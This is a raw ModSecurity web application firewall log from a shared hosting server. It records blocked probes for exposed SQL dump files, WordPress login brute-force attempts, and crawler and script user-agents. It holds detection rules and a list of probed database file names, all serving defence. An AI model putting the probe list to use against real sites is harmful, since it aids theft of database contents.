[Tue May 26 18:18:46.408226 2026] [security2:error] [pid 983082:tid 983101] [remote 67.23.237.2:60674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWWrrvhpIlZJOtze4s8-gAAjBI"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:18:46.482564 2026] [security2:error] [pid 983082:tid 983228] [client 32.192.74.76:58095] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/dump.sql"] [unique_id "ahWWrrvhpIlZJOtze4s8_gAAAJU"]
[Tue May 26 18:18:46.996971 2026] [security2:error] [pid 983082:tid 983286] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWrbvhpIlZJOtze4s86wAAAM8"]
[Tue May 26 18:18:49.597536 2026] [security2:error] [pid 983082:tid 983305] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWsLvhpIlZJOtze4s9IAAAAOI"]
[Tue May 26 18:18:50.003386 2026] [security2:error] [pid 983082:tid 983279] [client 153.67.181.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWsLvhpIlZJOtze4s9JgAAAMg"]
[Tue May 26 18:18:51.392511 2026] [security2:error] [pid 983082:tid 983244] [client 47.128.52.164:49068] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahWWs7vhpIlZJOtze4s9WAAAAKU"]
[Tue May 26 18:18:51.864425 2026] [security2:error] [pid 983082:tid 983337] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWsrvhpIlZJOtze4s9SAAAAQI"]
[Tue May 26 18:18:52.017673 2026] [security2:error] [pid 983082:tid 983298] [client 32.192.74.76:58399] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/traderscafe.sql"] [unique_id "ahWWtLvhpIlZJOtze4s9YgAAANs"]
[Tue May 26 18:18:52.620505 2026] [security2:error] [pid 983082:tid 983218] [client 23.236.139.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWtLvhpIlZJOtze4s9cAAAAIs"], referer: https://www.anujtradingco.com/
[Tue May 26 18:18:52.959698 2026] [security2:error] [pid 983082:tid 983254] [client 32.192.74.76:58461] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/traderscafe_db.sql"] [unique_id "ahWWtLvhpIlZJOtze4s9dwAAAK8"]
[Tue May 26 18:18:53.674201 2026] [security2:error] [pid 983082:tid 983253] [client 23.236.139.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWtbvhpIlZJOtze4s9jgAAAK4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1471757&moderation-hash=9cfbb804ff1b9d4869a2d8346f8fb92c
[Tue May 26 18:18:53.935134 2026] [security2:error] [pid 983082:tid 983321] [client 32.192.74.76:58495] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/localhost.sql"] [unique_id "ahWWtbvhpIlZJOtze4s9lQAAAPI"]
[Tue May 26 18:18:53.946555 2026] [core:error] [pid 983082:tid 983223] [client 147.185.132.55:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:18:53.946593 2026] [core:error] [pid 983082:tid 983223] [client 147.185.132.55:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:18:54.480229 2026] [security2:error] [pid 983082:tid 983260] [client 147.92.53.93:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWtrvhpIlZJOtze4s9pQAAALU"], referer: https://www.anujtradingco.com/
[Tue May 26 18:18:54.891940 2026] [security2:error] [pid 983082:tid 983284] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWtbvhpIlZJOtze4s9iAAAAM0"]
[Tue May 26 18:18:55.149836 2026] [security2:error] [pid 983082:tid 983110] [remote 57.141.2.17:50425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWWt7vhpIlZJOtze4s9tgAAphs"]
[Tue May 26 18:18:56.092322 2026] [security2:error] [pid 983082:tid 983325] [client 147.92.53.93:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWuLvhpIlZJOtze4s9zwAAAPY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1234114&moderation-hash=6b57cf664c9a913734dbc9e82706e6c6
[Tue May 26 18:18:56.720078 2026] [security2:error] [pid 983082:tid 983217] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWt7vhpIlZJOtze4s9vAAAAIo"]
[Tue May 26 18:18:56.987878 2026] [security2:error] [pid 983082:tid 983222] [client 185.191.171.18:28124] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/day/2025-07-01/"] [unique_id "ahWWuLvhpIlZJOtze4s94QAAAI8"]
[Tue May 26 18:18:56.988055 2026] [security2:error] [pid 983082:tid 983222] [client 185.191.171.18:28124] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/day/2025-07-01/"] [unique_id "ahWWuLvhpIlZJOtze4s94QAAAI8"]
[Tue May 26 18:18:57.216039 2026] [security2:error] [pid 983082:tid 983251] [client 32.192.74.76:58696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/mysqldump.sql"] [unique_id "ahWWubvhpIlZJOtze4s95gAAAKw"]
[Tue May 26 18:18:57.931062 2026] [security2:error] [pid 983082:tid 983336] [client 114.119.134.41:65295] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/en/"] [unique_id "ahWWubvhpIlZJOtze4s-BQAAAQE"], referer: http://www.plenitudotonal.com/en/
[Tue May 26 18:18:58.408813 2026] [security2:error] [pid 983082:tid 983318] [client 32.192.74.76:58764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/mysql.sql"] [unique_id "ahWWurvhpIlZJOtze4s-FwAAAO8"]
[Tue May 26 18:18:59.113231 2026] [security2:error] [pid 983082:tid 983319] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWurvhpIlZJOtze4s-CwAAAPA"]
[Tue May 26 18:19:01.802537 2026] [security2:error] [pid 983082:tid 983330] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWvLvhpIlZJOtze4s-PAAAAPs"]
[Tue May 26 18:19:02.882400 2026] [security2:error] [pid 983082:tid 983317] [client 32.192.74.76:59010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/site.sql"] [unique_id "ahWWvrvhpIlZJOtze4s-ZQAAAO4"]
[Tue May 26 18:19:03.782042 2026] [security2:error] [pid 983082:tid 983122] [remote 176.61.149.56:46336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWWv7vhpIlZJOtze4s-eQAAvic"]
[Tue May 26 18:19:06.080198 2026] [security2:error] [pid 983082:tid 983218] [client 32.192.74.76:59193] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/sql.sql"] [unique_id "ahWWwrvhpIlZJOtze4s-rwAAAIs"]
[Tue May 26 18:19:06.736205 2026] [security2:error] [pid 983082:tid 983298] [client 32.192.74.76:59248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/temp.sql"] [unique_id "ahWWwrvhpIlZJOtze4s-ugAAANs"]
[Tue May 26 18:19:07.447199 2026] [security2:error] [pid 983082:tid 983257] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWwbvhpIlZJOtze4s-qwAAALI"]
[Tue May 26 18:19:09.646931 2026] [security2:error] [pid 983082:tid 983339] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWxLvhpIlZJOtze4s-2wAAAQQ"]
[Tue May 26 18:19:11.823279 2026] [security2:error] [pid 983082:tid 983339] [client 114.119.137.68:49003] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "xllent.in"] [uri "/"] [unique_id "ahWWx7vhpIlZJOtze4s_HgAAAQQ"], referer: https://internshala.com/company/xllent-corporate-services-pvt-ltd-1694080491/
[Tue May 26 18:19:12.207269 2026] [security2:error] [pid 983082:tid 983318] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWx7vhpIlZJOtze4s_DAAAAO8"]
[Tue May 26 18:19:12.690260 2026] [security2:error] [pid 983082:tid 983197] [remote 94.23.188.216:31776] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWWyLvhpIlZJOtze4s_NQAA9HI"]
[Tue May 26 18:19:12.690539 2026] [security2:error] [pid 983082:tid 983323] [client 94.23.188.216:31776] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWWyLvhpIlZJOtze4s_NQAA9HI"]
[Tue May 26 18:19:13.083925 2026] [security2:error] [pid 983082:tid 983237] [client 114.119.142.12:53901] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/shop-2/shop-accessories"] [unique_id "ahWWybvhpIlZJOtze4s_RQAAAJ4"], referer: https://www.anujoverseas.in/shop-2/shop-accessories
[Tue May 26 18:19:13.499809 2026] [security2:error] [pid 983082:tid 983199] [remote 5.42.158.148:35510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWybvhpIlZJOtze4s_RgAA7HQ"]
[Tue May 26 18:19:13.535522 2026] [security2:error] [pid 983082:tid 983247] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWx7vhpIlZJOtze4s_JwAAAKg"]
[Tue May 26 18:19:14.147717 2026] [security2:error] [pid 983082:tid 983163] [remote 148.113.128.19:41366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.gcirsm.org.in"] [uri "/"] [unique_id "ahWWyrvhpIlZJOtze4s_UgAA61A"]
[Tue May 26 18:19:14.147909 2026] [security2:error] [pid 983082:tid 983314] [client 148.113.128.19:41366] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.gcirsm.org.in"] [uri "/"] [unique_id "ahWWyrvhpIlZJOtze4s_UgAA61A"]
[Tue May 26 18:19:14.561735 2026] [security2:error] [pid 983082:tid 983290] [client 32.192.74.76:59677] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/translate.sql"] [unique_id "ahWWyrvhpIlZJOtze4s_VwAAANM"]
[Tue May 26 18:19:14.599831 2026] [security2:error] [pid 983082:tid 983161] [remote 5.42.158.148:35518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWyrvhpIlZJOtze4s_VgAAkU4"]
[Tue May 26 18:19:15.801402 2026] [security2:error] [pid 983082:tid 983245] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWybvhpIlZJOtze4s_TAAAAKY"]
[Tue May 26 18:19:17.045715 2026] [security2:error] [pid 983082:tid 983335] [client 32.192.74.76:59824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/users.sql"] [unique_id "ahWWzbvhpIlZJOtze4s_ggAAAQA"]
[Tue May 26 18:19:18.403648 2026] [security2:error] [pid 983082:tid 983323] [client 69.58.76.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWzrvhpIlZJOtze4s_lgAAAPQ"], referer: http://www.anujtradingco.com/
[Tue May 26 18:19:18.587933 2026] [security2:error] [pid 983082:tid 983258] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWzLvhpIlZJOtze4s_cgAAALM"]
[Tue May 26 18:19:19.151944 2026] [security2:error] [pid 983082:tid 983242] [client 202.76.172.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWzbvhpIlZJOtze4s_hQAAAKM"]
[Tue May 26 18:19:20.167750 2026] [security2:error] [pid 983082:tid 983335] [client 69.58.76.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWW0LvhpIlZJOtze4s_rQAAAQA"], referer: http://www.anujtradingco.com/pages/services-modern/
[Tue May 26 18:19:20.304000 2026] [security2:error] [pid 983082:tid 983338] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWzrvhpIlZJOtze4s_nAAAAQM"]
[Tue May 26 18:19:21.881304 2026] [security2:error] [pid 983082:tid 983238] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW0LvhpIlZJOtze4s_uwAAAJ8"]
[Tue May 26 18:19:23.275773 2026] [security2:error] [pid 983082:tid 983310] [client 62.244.225.226:20775] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWW0bvhpIlZJOtze4s_xQAAAOc"]
[Tue May 26 18:19:23.321478 2026] [security2:error] [pid 983082:tid 983175] [remote 92.205.109.21:59658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW07vhpIlZJOtze4s_5wAAmFw"]
[Tue May 26 18:19:23.350428 2026] [security2:error] [pid 983082:tid 983254] [client 134.195.101.194:44632] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "bhavisharchitects.com"] [uri "/wp-content/uploads/2019/10/1.Type-03-East-Side-Night-View-1.jpg"] [unique_id "ahWW07vhpIlZJOtze4s_7AAAAK8"]
[Tue May 26 18:19:23.763923 2026] [security2:error] [pid 983082:tid 983203] [remote 209.42.20.53:38350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWW07vhpIlZJOtze4s_8AAA_Xg"]
[Tue May 26 18:19:23.822353 2026] [security2:error] [pid 983082:tid 983088] [remote 92.205.109.21:59658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW07vhpIlZJOtze4s_9gAA7AU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:19:24.173411 2026] [security2:error] [pid 983082:tid 983202] [remote 153.127.19.115:56718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.19.127.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWW07vhpIlZJOtze4s__gAA7Xc"]
[Tue May 26 18:19:24.250008 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW07vhpIlZJOtze4s_5gAAAJs"]
